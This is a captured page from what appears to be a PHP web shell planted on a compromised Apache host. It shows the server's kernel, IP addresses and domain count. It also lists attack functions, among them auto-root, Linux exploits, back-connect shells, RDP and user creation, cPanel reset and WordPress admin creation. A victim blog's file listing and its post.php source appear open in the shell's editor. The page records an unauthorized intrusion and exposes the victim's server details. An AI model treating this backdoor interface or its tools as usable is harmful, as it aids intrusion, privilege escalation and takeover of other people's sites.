Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.118.33.255
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
itailorBlog /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
theme
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxr-xr-x
.htaccess
903
B
-rw-r--r--
auth.php
1.1
KB
-rw-r--r--
blog-cat.php
7.22
KB
-rw-r--r--
blog-single.php
10.8
KB
-rw-r--r--
category.php
2.53
KB
-rw-r--r--
index.html
131
B
-rw-r--r--
index.php
9.17
KB
-rw-r--r--
post.php
4.73
KB
-rw-r--r--
subscribe.php
1007
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : post.php
<?php require_once "includes/config.php"; $cu = pn(current_url()); $postDetails = getPostDetailsByUri($cu); $config['seoTitle'] = $postDetails['seo_title'] ?? null; $config['seoDescription'] = $postDetails['seo_description'] ?? null; $config['seoKeywords'] = $postDetails['seo_keywords'] ?? null; extract($config); ?> <?php include('includes/header.php'); ?> <!-- Celebrity Style --> <section class="itailor-single"> <div class="custom-container"> <div class="itailor_singleBlog_wrap"> <p class="font-11 singleBlog_tags"> <?= ucwords(str_replace('-', ' ', @$postDetails['cat_uri'])) ?> </p> <h1 class="font-42 singleBlog_h1"> <?= $postDetails['name'] ?> </h1> <p class="font-12 singleBlog_Auth"><span>By </span><span class="Auth_name"><?= ucwords(@$postDetails['author']) ?></span></p> <p class="font-12 singleBlog_Date"> <?= date('d M, Y', strtotime(@$postDetails['created'])) ?> </p> </div> <div class="itailorblog-editor"> <figure> <img class="Story_Logo" src="<?= base_url(@$postDetails['cover']) ?>" alt="<?= $postDetails['name'] ?>" loading="lazy"> <!-- <figcaption class="font-13"> <//?= $postDetails['name'] ?> </figcaption> --> </figure> <div class="itailorblog-editor-wrap"> <div class="itailorblog_editor_left"> <div class="blog_editor"> <?= $postDetails['content'] ?> </div> <div classs="itailorblog-toread"> <h2 class="toread_h2">people also read</h2> <?php $relatedPosts = getPostDetailsByCategory($postDetails['cat_uri']); ?> <ul class="story_toread"> <?php if (mysqli_num_rows(@$relatedPosts) > 0) { while ($row = mysqli_fetch_assoc(@$relatedPosts)) { ?> <li class="story_read_li"> <a href="<?= base_url('post/' . @$row['uri']) ?>" aria-label="<?= @$row['name'] ?>"> <?= @$row['name'] ?> </a> </li> <?php } } ?> </ul> </div> </div> <div class="itailorblog_editor_right"> <div class="stickY"> <div class="add_width"> <h2 class="font-11">Advertisement</h2> <a href="javascript:void(0)" target="_blank" aria-label="Today’s Stories"> <img class="qwe" src="<?= base_url('img/Rectangle.png') ?>" alt="Ads" loading="lazy"> </a> </div> </div> </div> </div> </div> <!-- dear sub --> <!-- <div class="dm_it"> <div class="single-blogger"> <h2 class="font-32">Discover Your Style</h2> <p class="font-17">Lorem Ipsum is simply dummy text of the printing and typesetting industry. Something </p> <div class="subscription"> <form action="<?= base_url('subscribe.php') ?>" method="post"> <input class="sub_email" type="email" name="email" id="email" placeholder="Enter your mail address" autocomplete="off"> <input class="sub_submit" type="submit" value="Sign Up Now"> <input type="hidden" name="ru" value="<?= hashed(current_url()) ?>"> </form> </div> <p class="font-12">By signing up you agree to our User Agreement and Privacy Policy & Cookie Statement. </p> </div> </div> --> <!-- dear sub --> <!-- dear ads --> <div class="bottom-ad"> <div class="add_width"> <h2 class="font-11">Advertisement</h2> <a href="javascript:void(0)" target="_blank" aria-label="Today’s Stories"> <img class="adv_Logo" src="./img/add-1.png" alt="Today’s Stories" loading="lazy"> </a> </div> </div> </div> </section> <?php include('includes/footer.php'); ?>
Close